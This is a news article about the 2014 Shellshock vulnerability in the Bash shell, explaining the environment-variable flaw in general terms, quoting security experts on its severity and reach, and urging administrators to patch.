A major new security vulnerability that affects the Bash shell has been touted as being the most dangerous threat to Internet security ever.
A major new security vulnerability has been discovered which threatens to affect a vast swathe of computing systems, including Web hosts, cloud services and even Internet-connected devices. Referred to as the Bash or Shellshock bug, it is already being touted as the most dangerous threat to Internet security, as well as “bigger than Heartbleed.”
The Bash bug affects the popular Bash shell up to–and including–version 4.3, and was discovered by software developer Stephane Chazelas. The 22-year-old security flaw dates back to version 1.13, and relates to how Bash handles of environmental variables. When assigning a function to a variable, Bash would apparently execute the railing code in the function definition, opening the door for code-injection attacks.
The problem with the Bash bug relates to many programs running the Bash shell in the background. According to security expert Robert Graham, the Bash bug is bigger than Heartbleed because “the bug interacts with other software in unexpected ways” and because an “enormous percentage” of software interacts with the shell.
“We’ll never be able to catalogue all the software out there that is vulnerable to the Bash bug,” said Graham to CNET. “While the known systems (like your web-server) are patched, unknown systems remain unpatched. We see that with the Heartbleed bug: six months later, hundreds of thousands of systems remain vulnerable.”
The Bash shell is found in a number of operating systems, including Linux, Unix and even Apple’s OS X, which has its roots in Unix. Indeed, a test done by Ars Technica noted that OS X Mavericks contained a vulnerable version of Bash. There is also concern that it could affect the iPhone DHCP service, and could be developed as a worm–a self-replicating malware–that could corrupt or disable tens of thousands of servers.
One of the most succinct summations of the Bash bug came in via email from Dan Ingevaldson, CTO at Easy Solutions.
“This bug is not a remote ‘code execution’ vulnerability–which means that some tricks are required to actually do something interesting,” wrote Ingevaldson. “It’s a remote ‘command execution’ vulnerability that may allow remote attackers to simply run commands on the remote system. No crashes, no complexity, easy to test, easy to exploit. On the CVSS scale it’s all 10s across the board.”
Hackers are already exploiting the Bash vulnerability, and some reports have noted that the first attacks started within 4.5 hours of it being publicly announced. As such, systems administrators should patch without delay.